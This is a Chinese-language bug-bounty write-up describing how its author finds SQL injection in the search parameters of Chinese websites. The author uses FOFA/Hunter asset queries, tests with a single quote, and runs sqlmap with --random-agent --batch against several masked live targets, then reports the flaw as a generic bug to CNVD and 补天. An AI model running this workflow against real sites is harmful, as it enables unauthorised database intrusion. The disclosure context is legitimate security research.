本文仅用于技术讨论与学习,利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
挖洞,讲究的是个运气

Body:日常挖洞我比较喜欢打开fofa和hunter和360搜索关键字,反正各种组合慢慢找慢慢看说不定就出货了

body="系统" &&
country="CN"能打的资产贼多吧然后去点开,看到[功能点]{.mark}都随手测一下

image-20231107134700195

随便翻翻看 先看这个站点有哪些功能点

image-20231107134748850

看到搜索框 就试了试注入,Xss和可能存在ssrf,就加了个’看有无报错

http://xxx.xx.xxx.xxx/search/?key=1%27

{width=”5.760416666666667in”
height=”2.9166666666666665in”}

还真报错了挖洞9分运气,会手注的师傅带带 于是用SQLmap和超级SQL梭哈

python3 sqlmap.py -u http://xxx.xx.xxx.xxx/search/?key=1
--random-agent --batch

image-20231107134819322

image-20231107134824135

交完cnvd之后就想会不会有这套模板同样特征的漏洞呢

于是翻网页源代码

image-20231107134829100

拿到hunter去看资产贼多

image-20231107134834980

Ok通杀到手,但资产不满足5000w于是交了补天

image-20231107134841927

补天收录通用的规则是前台漏洞比如前台注入未授权rce啥的

然后漏洞复现互联网案例十例复现三案例十

image-20231107134847253

image-20231107134854534

判断有注入,然后sqlmap一把梭

python3 sqlmap.py -u https://www.xxx.cn/search/index.html?key=1
--random-agent --batch

image-20231107134902126

image-20231107134915466

image-20231107134920429

还是扔进sqlmap梭哈

python3 sqlmap.py -u https://www.xxxxxx.com/search/?key=1
--random-agent --batch

image-20231107134926228

image-20231107134930280

image-20231107134936862

Sqlmap梭哈

python3 sqlmap.py -u https://www.xxxxxx.cn/search/?key=1 --random-agent
--batch

image-20231107134947699

​ –记2022年12.24第一次挖洞的小通杀